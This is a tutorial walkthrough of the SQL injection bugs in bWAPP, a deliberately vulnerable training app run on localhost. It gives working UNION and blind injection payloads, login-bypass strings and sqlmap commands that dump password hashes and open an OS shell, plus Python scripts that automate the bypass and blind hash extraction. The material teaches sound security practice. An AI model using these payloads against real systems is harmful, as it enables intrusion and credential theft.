bWAPP, or a buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares you to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.
What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.
You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.
bWAPP SQL Injection
Parts 1-4, security level Low:
- SQL Injection - Search page
- SQL Injection - Select page
- SQL Injection - Login page
- SQL Injection - Blind SQL injection page
Currently there are 5 bugs in bWAPP related to SQL injection:
- the Search page, where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
- the Select page, where you can select a specific movie from a drop-down list.
- the Login page, where you can enter your credentials to login.
- the Blind SQL injection page, where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
- and where is bug number 5?
A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where.
SQL Injection - Search page
Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string, all movies will be displayed.
The injection symptom: when entering a single quote (') in the search field we receive the following message: 'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'. I love that message! It tells us three things at once: the back end is MySQL, our input lands inside a quoted LIKE pattern (note the %), and database errors are echoed straight back to us.
Here we go for some basic SQL injection fun. blah' or 1=1-- results in all the records:
blah' or 1=2-- results in 0 records:
So the URL parameter title is definitely susceptible to SQL injection. Note the %20 after the -- in the URL: MySQL only treats -- as a comment when it is followed by whitespace, so the trailing space is part of the payload:
http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search
What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you do, let's go...
You can use the SQL UNION operator to append the rows of a second SELECT of your own choosing to the application's result set; the page then renders your rows as if they were movies.
First of all, the second SELECT must return exactly the same number of columns as the original statement (with compatible types), otherwise the database rejects the UNION!
blah' union select 1--
results in an error: MySQL reports that the used SELECT statements have a different number of columns.
Add one column at a time; after a while you will discover that you need 6 columns:
blah' union select 1,1,1,1,1,1--
results in a row of 1s displayed in the movie table:
And that's great! Now we can put a value of our own choosing into one of the displayed columns, for example the name of the current database:
blah' union select 1,DATABASE(),1,1,1,1--
We have found the name of the current database: bWAPP
Now our mission is to retrieve the table names of the current database:
blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--
We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)
We want to retrieve the column names for the table users:
blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--
The column names login, password, email and secret look interesting. We want those values!
blah' union select 1,login,password,email,secret,1 from users--
OK, we have the values! We exploited the underlying database and retrieved some confidential data. The password column holds hashes rather than clear text, so the passwords cannot be read directly. Those guys from MME are doing a great job...
After 10 seconds, 1 password was already cracked using John :p
Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!
Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?
Right... we will take over the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.
sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in Python.
We can automate the previous commands with sqlmap.
This fingerprints the back-end DBMS and enumerates the database names (--dbs):
./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs
This dumps the chosen columns of the users table; when sqlmap recognises password hashes it even offers to crack them with a dictionary attack on the spot:
./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump
Using sqlmap we can also get a shell on the underlying operating system: the tool uploads a web shell through the injection and runs your favorite OS commands through it. On MySQL this only works when the database user has the FILE privilege and there is a web directory the database server can write to. A very nice and powerful tool. Thank you Bernardo and Miroslav!
./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell
SQL Injection - Select page
Tools used: Firefox add-on HackBar.
Select a movie and look at the URL: it carries the parameter movie=1. What happens if we change it to movie=1' ?
We get a SQL error. Well done, I love this message! Because the parameter is numeric, the application does not wrap it in quotes, so from here on we can inject without a quote at all.
Now try a UNION SELECT to find the number of columns. With the wrong number MySQL complains that the SELECT statements have a different number of columns, so add or cut columns until it accepts the query.
Well done, 6 columns again. But the output is hard to read because the genuine movie row is displayed first, so change the movie id to 0: no real movie has that id, and the page renders only our injected row, which gives a much better view.
Four of the six columns are reflected on the page, positions 2, 3, 4 and 5. Time to put some SQL functions in those slots:
into column 2 we add user(), into column 3 database(), into column 4 version().
Well done!
SQL Injection - Login page
Info: Insecure Login Form
Login bypass:
User: Superhero' or 1=1 or 'a'='a
Password: ' or 1=1-- -
The trailing " -" is not a typo: MySQL only treats -- as a comment when whitespace follows it, and a lone trailing space is easily trimmed away somewhere between the form and the query, so the extra dash keeps the comment alive.
Welcome Neo ...
More examples for the User field:
Superhero' or 1=1 or '
Superhero' or 'a'='a' or '
Superhero' or '
Superhero' or 1=1 and '
Superhero' or 'a'='a
Keep operator precedence in mind: AND binds tighter than OR, so the application's own AND password = '...' clause attaches to whatever term precedes it. Superhero' or 1=1 or ' therefore succeeds on its own, while variants such as Superhero' or ' or Superhero' or 1=1 and ' only succeed when the Password field is injected as above.
Well done!
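The precedence point is easier to see when you can print the statement the page builds. The following is an added example, my own code rather than bWAPP's: a one-user table (name Neo and password trinity are made up, and stored in clear for brevity) with the login query assembled by string concatenation exactly as the vulnerable form does, and a parameterised version beside it.

```python
import sqlite3

# Constructed stand-in for the login page's user table: one account with an
# assumed name and password. A real application would store a hash instead,
# which changes nothing about the injection: the login field is still glued in.
def build_users():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES('Neo', 'trinity')")
    return conn


def login_sql(login, password):
    """The statement the vulnerable page builds: both fields are concatenated."""
    return ("SELECT login FROM users WHERE login = '" + login +
            "' AND password = '" + password + "'")


def vulnerable_login(conn, login, password):
    """Returns the login of the first matching row ('Welcome Neo'), or None."""
    row = conn.execute(login_sql(login, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, login, password):
    """The fix: bound parameters, so quotes and comment markers stay inert."""
    row = conn.execute("SELECT login FROM users WHERE login = ? AND password = ?",
                       (login, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_users()
    # AND binds tighter than OR, so the trailing "AND password = '...'" only
    # attaches to the last injected term; an earlier "OR 1=1" wins on its own.
    print(vulnerable_login(db, "Superhero' or 1=1 or '", "wrong"))          # Neo
    print(vulnerable_login(db, "Superhero' or 1=1 and '", "wrong"))         # None
    # ...unless the password field is injected as well (the pair from the page):
    print(vulnerable_login(db, "Superhero' or 1=1 and '", "' or 1=1-- -"))  # Neo
    print(login_sql("Superhero' or 1=1 and '", "' or 1=1-- -"))
    print(safe_login(db, "Superhero' or 1=1 or '", "' or 1=1-- -"))         # None
    print(safe_login(db, "Neo", "trinity"))                                  # Neo
```

Reading the printed statement makes the failure of the "and '" variant obvious: the injected 1=1 is ANDed with an empty string (false) and with the password check, and only the -- - in the Password field, which comments out the real closing quote and tacks on a free-standing OR 1=1, rescues it.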
SQL Injection - Blind
Here the page only tells you whether the movie exists: no movie details and no error message come back, so every fact about the database has to be inferred from that yes/no answer, one question at a time. That is tedious by hand, so we automate it with sqlmap.
Use Tamper Data or any other tool (the browser's developer tools will do) to grab your session cookie, and pass it together with the security_level cookie:
Pentest with sqlmap:
./sqlmap.py -u "http://localhost/bWAPP/sqli_4.php?title=Iron+Man&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs
sqlmap found a working payload.
Then retrieve the database users and their hashed passwords; once we have them it is time to crack the hash file as before.
Well done!
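To see what sqlmap is doing behind that progress bar, here is an added Python example (my own code, neither bWAPP's nor sqlmap's) that rebuilds the blind page as a yes/no oracle over SQLite and extracts the bee user's password hash with a binary search on every character. The tables, the movie title and the assumption that the stored value is an unsalted SHA-1 of "bug" are constructed for the example; the functions length/substr/unicode are SQLite's, with MySQL's length/substring/ascii playing the same role.

```python
import hashlib
import sqlite3

# Constructed stand-in for the blind page's database. The users row holds an
# unsalted SHA-1 of "bug" (an assumption about how the password of user bee is
# stored; the page only says the column is hashed).
BEE_HASH = hashlib.sha1(b"bug").hexdigest()
QUERIES = [0]  # how many yes/no questions the extraction needed


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies(id INTEGER, title TEXT)")
    conn.execute("INSERT INTO movies VALUES(1, 'Iron Man')")
    conn.execute("CREATE TABLE users(login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES('bee', ?)", (BEE_HASH,))
    return conn


def movie_exists(conn, title):
    """The oracle: the page only reveals whether the (injected) query matched."""
    QUERIES[0] += 1
    sql = "SELECT * FROM movies WHERE title = '" + title + "'"
    return conn.execute(sql).fetchone() is not None


def ask(conn, condition):
    """Turn any SQL boolean into a yes/no answer by AND-ing it onto a title
    that is known to exist: 'exists' means the condition holds."""
    return movie_exists(conn, "Iron Man' AND (" + condition + ")-- ")


def binary_search(greater_than, lo, hi):
    """Find x in [lo, hi] given an oracle that answers 'is x > n?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(conn, column, table, where, max_len=64):
    """Recover one string cell a character at a time, about seven questions per
    character (plus a few for the length) instead of one per candidate byte."""
    sub = "(SELECT " + column + " FROM " + table + " WHERE " + where + ")"
    length = binary_search(
        lambda n: ask(conn, "length(" + sub + ") > " + str(n)), 0, max_len)
    value = ""
    for pos in range(1, length + 1):
        probe = "unicode(substr(" + sub + ", " + str(pos) + ", 1))"
        code = binary_search(lambda n: ask(conn, probe + " > " + str(n)), 0, 127)
        value += chr(code)
    return value


if __name__ == "__main__":
    db = build_db()
    print(extract(db, "login", "users", "login = 'bee'"))     # bee
    print(extract(db, "password", "users", "login = 'bee'"))  # the 40-character SHA-1
    print(QUERIES[0], "yes/no questions in total")
```

Every question is a full HTTP request in the real attack, which is why blind extraction is slow and noisy in the web server log: a 40-character hash costs roughly three hundred requests here, and sqlmap's --threads and --technique options exist precisely to trade that volume against speed.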